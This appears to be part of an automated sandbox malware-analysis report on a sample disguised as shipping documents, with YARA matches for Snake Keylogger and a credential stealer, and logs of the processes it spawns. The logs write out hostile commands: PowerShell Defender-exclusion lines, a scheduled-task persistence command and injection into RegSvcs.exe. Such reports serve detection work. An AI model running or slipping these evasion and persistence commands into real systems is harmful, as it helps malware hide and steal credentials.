Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030ACFAA 14_2_030ACFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030ACCD8 14_2_030ACCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A3AA1 14_2_030A3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AF961 14_2_030AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AE97A 14_2_030AE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A39EE 14_2_030A39EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A29EC 14_2_030A29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A3E09 14_2_030A3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C91E80 14_2_06C91E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9E258 14_2_06C9E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C917A0 14_2_06C917A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C90B30 14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9FC68 14_2_06C9FC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C99C70 14_2_06C99C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C95028 14_2_06C95028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C99548 14_2_06C99548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C92968 14_2_06C92968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9EAF8 14_2_06C9EAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9E6A0 14_2_06C9E6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9E6B0 14_2_06C9E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9E249 14_2_06C9E249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C91E70 14_2_06C91E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9DE00 14_2_06C9DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C99BFA 14_2_06C99BFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9178F 14_2_06C9178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C98B91 14_2_06C98B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9F3A8 14_2_06C9F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C98BA0 14_2_06C98BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9F3B8 14_2_06C9F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9EF51 14_2_06C9EF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9EF60 14_2_06C9EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9EB08 14_2_06C9EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C99328 14_2_06C99328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C90B20 14_2_06C90B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9D0F8 14_2_06C9D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9CC8F 14_2_06C9CC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9CCA0 14_2_06C9CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C90040 14_2_06C90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9F801 14_2_06C9F801
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C90006 14_2_06C90006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C95018 14_2_06C95018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9F810 14_2_06C9F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9DDF1 14_2_06C9DDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9D999 14_2_06C9D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9D9A8 14_2_06C9D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9D540 14_2_06C9D540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C92959 14_2_06C92959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_06C9D550 14_2_06C9D550
Sample file is different than original file name gathered from version info
Source: rShippingDocuments240384.exe, 00000000.00000002.1485239345.00000000015AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000000.1439702882.0000000001014000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamedKuN.exe8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1486523776.0000000003534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1494359208.0000000009650000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe Binary or memory string: OriginalFilenamedKuN.exe8 vs rShippingDocuments240384.exe
Uses 32bit PE files
Source: rShippingDocuments240384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: rShippingDocuments240384.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tdcorV.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, j.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, j.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, --.cs Base64 encoded string: 'yZwG7FMnGGuocSJ7OLYaO9AHE2xGTJkuaGU76Yb25AT1Z/62t6lZAA=='
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.SetAccessControl
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.AddAccessRule
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.SetAccessControl
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs Security API names: _0020.AddAccessRule
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe File created: C:\Users\user\AppData\Roaming\tdcorV.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Mutant created: \Sessions\1\BaseNamedObjects\wpQVdupdPuCCieiuNojCBKi
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe File created: C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp Jump to behavior
Source: rShippingDocuments240384.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rShippingDocuments240384.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000337A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rShippingDocuments240384.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe File read: C:\Users\user\Desktop\rShippingDocuments240384.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\rShippingDocuments240384.exe "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\tdcorV.exe C:\Users\user\AppData\Roaming\tdcorV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
